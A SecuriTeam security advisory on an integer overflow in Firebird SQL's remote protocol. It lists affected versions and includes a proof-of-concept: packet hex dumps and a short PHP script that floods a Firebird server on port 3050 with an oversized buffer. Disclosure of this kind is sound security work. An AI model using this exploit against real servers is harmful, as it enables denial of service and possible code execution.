[EXPL] Firebird Integer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Firebird Integer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

 <http://www.firebirdsql.org/> Firebird is "a relational database offering 
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of 
Unix platforms". A vulnerability in Firebird allows remote attackers to 
cause the server to overflow an internal buffer by causing it to overflow 
the value of an integer.

DETAILS

Vulnerable Systems:
 * Firebird SQL version 1.0.3 and before.
 * Firebird SQL version 1.5.5 and before.
 * Firebird SQL version 2.0.3 and before.
 * Firebird SQL version 2.1.0 Beta 2 and before.

Immune Systems:
 * Firebird SQL version 1.5.6 (to be released)
 * Firebird SQL version 2.0.4 (to be released)
 * Firebird SQL version 2.1.0 RC1


Exploit:
/**
 *  FIREBIRD REMOTE BUFFER OVERFLOW.
 *  ITDEFENCE.ru Proof-of-Concept (POC)
 *  Eugene Minaev (underwater@itdefence.ru)
 *
 *  Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 
1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0
 *  RC1 might allow remote attackers to execute arbitrary code via crafted 
op_receive, op_start, op_start_and_receive,
 *  op_send, (5) op_start_and_send, and (6) op_start_send_and_receive XDR 
requests, which triggers memory corruption.
 *
 *  Vulnerable packages
 *
 *      Firebird SQL 1.0.3 and before.
 *      Firebird SQL 1.5.5 and before.
 *      Firebird SQL 2.0.3 and before.
 *      Firebird SQL 2.1.0 Beta 2 and before.
 *
 *  Non-vulnerable packages
 *
 *      Firebird SQL 1.5.6 (to be released)
 *      Firebird SQL 2.0.4 (to be released)
 *      Firebird SQL 2.1.0 RC1
 *
 *  src/remote/protocol.cpp:417
 *
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
 *      MAP(xdr_short, 
reinterpret_cast<SSHORT&>(data->p_data_incarnation));
 *      MAP(xdr_short, 
reinterpret_cast<SSHORT&>(data->p_data_transaction));
 *      MAP(xdr_short, 
reinterpret_cast<SSHORT&>(data->p_data_message_number));
 *      return xdr_request(xdrs, data->p_data_request,
 *           data->p_data_message_number,
 *           data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, 
p);
 *
 *  Firebird Connect Packet
 *
 *  0x0000   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   
.............E.
 *  0x0010   00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8   
&#1112;....@..%&#1040;&#1025;|c&#1040;&#1025;
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10   |c.&#1082;. 
.......P.
 *  0x0030   40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00   
@...............
 *  0x0040   00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F   
........<C:\Pro
 *  0x0050   67 72 61 6D 20 46 69 6C-65 73 5C 46 69 72 65 62   gram 
Files\Fireb
 *  0x0060   69 72 64 5C 46 69 72 65-62 69 72 64 5F 31 5F 35   
ird\Firebird_1_5
 *  0x0070   5C 65 78 61 6D 70 6C 65-73 5C 45 4D 50 4C 4F 59   
\examples\EMPLOY
 *  0x0080   45 45 2E 66 64 62 00 00-00 02 00 00 00 13 01 04   
EE.fdb..........
 *  0x0090   52 4F 4F 54 04 09 75 6E-64 65 72 77 68 61 74 06   
ROOT..underwhat.
 *  0x00A0   00 00 00 00 00 08 00 00-00 01 00 00 00 02 00 00   
...............
 *  0x00B0   00 03 00 00 00 02 00 00-00 0A 00 00 00 01 00 00   
...............
 *  0x00C0   00 02 00 00 00 03 00 00-00 04                     ..........
 *
 *  Firebird Login Packet.
 *
 *  0x0000   00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00   
.............E.
 *  0x0010   00 94 00 00 6C 6C 40 06-93 E0 C0 A8 7C 63 C0 A8   . 
.ll@.?&#1072;&#1040;&#1025;|c&#1040;&#1025;
 *  0x0020   7C 63 0B EA 0E 94 00 00-00 95 00 00 00 11 50 10   |c.&#1082;. 
.. ....P.
 *  0x0030   40 00 00 00 00 00 00 00-00 13 00 00 00 00 00 00   
@...............
 *  0x0040   00 3C 43 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C   
<C:\Program Fil
 *  0x0050   65 73 5C 46 69 72 65 62-69 72 64 5C 46 69 72 65   
es\Firebird\Fire
 *  0x0060   62 69 72 64 5F 31 5F 35-5C 65 78 61 6D 70 6C 65   
bird_1_5\example
 *  0x0070   73 5C 45 4D 50 4C 4F 59-45 45 2E 66 64 62 00 00   
s\EMPLOYEE.fdb..
 *  0x0080   00 1E 01 1C 06 53 59 53-44 42 41 1E 0B 51 50 33   
....SYSDBA..QP3
 *  0x0090   4C 4D 5A 2F 4D 4A 68 2E-3A 04 00 00 00 00 3E 00   
LMZ/MJh.:.....>.
 *  0x00A0   00 00                                             ..
 *
 */
 
    $___suntzu = "\x00\x00\x00\x4a" .  str_repeat( "\x4a" , 3000);
    for ($temp = 0; $temp < 5; $temp ++){
       $___zuntzu  =   fsockopen('192.168.124.99',3050);
       fwrite($___zuntzu , $___suntzu);
       fclose($___zuntzu );
       sleep(1);
    }
 
?>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:underwater@itdefence.ru> 
Eugene Minaev.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.